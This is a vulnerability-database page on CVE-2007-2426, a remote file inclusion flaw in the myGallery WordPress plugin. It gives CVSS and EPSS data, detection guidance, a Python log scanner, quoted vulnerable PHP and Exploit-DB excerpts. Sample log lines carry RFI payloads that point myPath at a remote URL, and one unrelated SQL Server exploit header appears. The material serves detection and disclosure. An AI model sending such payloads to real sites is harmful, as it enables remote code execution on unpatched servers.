CVE-2007-2426
Published 2007-05-02
CVE-2007-2426: PHP remote file inclusion vulnerability in myfunctions/mygallerybrowser.php in the myGallery 1.4b4 and earlier plugin for WordPress allows remote attackers to…
Priority P2 · 72 · high · CVSS 2.0 7.5
AV:N/AC:L/Au:N/C:P/I:P/A:P
ITW EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 62.87% (99.1th percentile)
PHP remote file inclusion vulnerability in myfunctions/mygallerybrowser.php in the myGallery 1.4b4 and earlier plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the myPath parameter.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| wildbits | mygallery | <= 1.4b4 | — |
Detection & IOCs (extracted from sources)
- The RFI payload is delivered via the 'myPath' parameter in both GET and POST requests to mygallerybrowser.php; alert on requests where this parameter contains an external URL (http:// or ftp://).
- Vulnerable only when PHP's 'allow_url_include' (and/or 'allow_url_fopen') is enabled, as the exploit relies on require_once() loading a remote URL supplied by the attacker.
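The detection described in the two IOCs above, as an added example (not code from the page's sources): a small Python scanner over constructed Combined Log Format lines that flags requests to mygallerybrowser.php whose myPath value carries a URL scheme, decoding single and double percent-encoding, and marks POST requests to the script for review because access logs do not record request bodies. It generalises the page's http:// and ftp:// to https/ftps and to PHP's php:// and data: stream wrappers, which the same allow_url_include setting gates; the log lines and addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (Combined Log Format) for this example.
SAMPLE_LOG = """\
203.0.113.5 - - [02/May/2007:10:01:02 +0000] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://203.0.113.9/x HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.6 - - [02/May/2007:10:01:05 +0000] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=ftp%3A%2F%2F203.0.113.9%2Fx HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.2 - - [02/May/2007:10:02:00 +0000] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=..%2Fwp-content HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.3 - - [02/May/2007:10:03:00 +0000] "GET /index.php?p=3 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [02/May/2007:10:04:00 +0000] "POST /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# URL schemes PHP's include/require will open when allow_url_include is enabled.
REMOTE_SCHEME_RE = re.compile(r'^(https?|ftps?)://|^(php|data):', re.IGNORECASE)


def classify(line):
    """Return ('rfi', ip, decoded_value), ('post-review', ip, None) or None for one log line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    # Only the vulnerable script is of interest; the plugin path prefix may vary per site.
    if not parts.path.lower().endswith('/mygallerybrowser.php'):
        return None
    for value in parse_qs(parts.query).get('myPath', []):
        decoded = unquote(unquote(value))  # parse_qs decoded once; catch double-encoded payloads
        if REMOTE_SCHEME_RE.match(decoded):
            return ('rfi', m.group('ip'), decoded)
    if m.group('method') == 'POST':
        # The parameter is also accepted via POST, but bodies are not in the access log:
        # surface these requests so a WAF or full-request capture can be consulted.
        return ('post-review', m.group('ip'), None)
    return None


def scan(log_text):
    """Run classify() over every line and return the list of hits in log order."""
    return [hit for hit in (classify(l) for l in log_text.splitlines()) if hit]


if __name__ == '__main__':
    for kind, ip, value in scan(SAMPLE_LOG):
        print(f'{kind:12} {ip:15} {value or ""}')
```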
CVSS provenance
NVD (CVSS 2.0): 7.5 HIGH, AV:N/AC:L/Au:N/C:P/I:P/A:P
VulnCheck: 7.5 HIGH
GHSA
GHSA-r73m-5g7h-cj4f: PHP remote file inclusion vulnerability in myfunctions/mygallerybrowser
GHSA (unreviewed) · 2022-05-01
VulnCheck
wildbits mygallery: Improper Control of Generation of Code ('Code Injection')
VulnCheck · 2007 · CVSS 7.5
Affected: wildbits mygallery
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://wpscan.com/vulnerability/35a80f1b-3825-45f8-ba88-5b95681baa94/
No detection rules found.
Exploit-DB
Microsoft SQL Server - Distributed Management Objects Buffer Overflow
Exploit-DB · 2007-09-12 · CVE-2007-4814
---
Code Execute
+ Tested Operating System: Windows XP SP2 KR, Windows 2000 Pro SP4 KR
+ Tested Software: MSDE 2000 SQLDMO.dll (version 2000.80.760.0)
+ Reference & Thanks:
  code by rgod http://www.milw0rm.com/exploits/4379
  code by Trirat Puttaraksa http://www.milw0rm.com/exploits/2426
+ Author: 96sysim ([email protected])
// Heap Spray
// execute "calc.exe"
Exploit-DB
WordPress Plugin mygallery 1.4b4 - Remote File Inclusion
Exploit-DB · 2007-04-29 · CVE-2007-2426
---
# myGallery 1.2.1 (myPath) Remote File Include Vulnerability
# Script Page: http://www.wildbits.de/usr_files/mygallery_1.2.1.zip
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# V.Code (vulnerable code quoted from myfunctions/mygallerybrowser.php)
#########################################################
```php
<?php
// Vulnerable code as quoted in the advisory; the [+] markers are the author's annotations.
if (!$_POST) {
    $mypath = $_GET['myPath'];   // <---------[+] path taken straight from the query string
} else {
    $mypath = $_POST['myPath'];  // <---------[+] or from the POST body
}
// <---------[+] with allow_url_include enabled, a URL in myPath makes PHP fetch and execute remote code
require_once($mypath . '/wp-config.php');
```
No writeups or analysis indexed.
References:
- http://osvdb.org/34356
- http://secunia.com/advisories/25042
- http://www.securityfocus.com/bid/23702
- http://www.vupen.com/english/advisories/2007/1582
- https://exchange.xforce.ibmcloud.com/vulnerabilities/33955
- https://www.exploit-db.com/exploits/3814